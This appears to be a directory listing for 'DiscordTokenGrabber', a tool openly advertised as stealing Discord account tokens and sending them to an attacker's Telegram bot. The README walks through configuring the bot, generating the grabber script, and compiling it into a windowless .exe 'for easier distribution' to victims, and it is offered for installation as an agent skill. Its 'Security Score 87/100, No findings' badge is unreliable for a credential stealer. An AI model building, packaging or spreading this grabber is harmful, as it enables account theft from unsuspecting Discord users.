SkillAgentSearch skills...

DiscordTokenGrabber

💎 Best Discord Token Grabber - Send To Telegram Bot

Install / Use

/learn @secabuser/DiscordTokenGrabber

README

💎 Best Discord Token Grabber - Send To Telegram Bot

Tool Screenshot


How to Use


Setup

  1. Run start.bat: Double-click the start.bat file to begin the setup process.
  2. Paste your Bot Token: Get your bot token from @BotFather on Telegram and paste it when prompted.
  3. Paste your User ID: Obtain your numeric user ID from @userinfobot on Telegram and paste it when requested.
  4. Enter Grabber File Name: Type the desired name for your generated grabber script (e.g., grabber.py).
  5. Grabber File Created Successfully: The grabber file will be generated and saved in your DiscordTokenGrabber directory.

How To Convert to Executable (.exe)

You can convert the Python script into a standalone executable (.exe) file for easier distribution on Windows.

  1. Install PyInstaller: Open cmd or PowerShell and run:

    pip install pyinstaller
    
  2. Generate the Executable: Navigate to the directory where main.py is saved, then run:

    pyinstaller --onefile --noconsole main.py
    
    • --onefile: Packages everything into a single .exe file.
    • --noconsole: Prevents a console window from opening when the .exe is run.
  3. Find the Executable: The generated .exe file (main.exe by default) will be located in the dist folder within your script's directory.

Results

  • All results sended to bot tel
  • Full Fast

View on GitHub
GitHub Stars7
CategoryDevelopment
Updated5mo ago
Forks0

Languages

Python

Security Score

87/100

Audited on Oct 17, 2025

No findings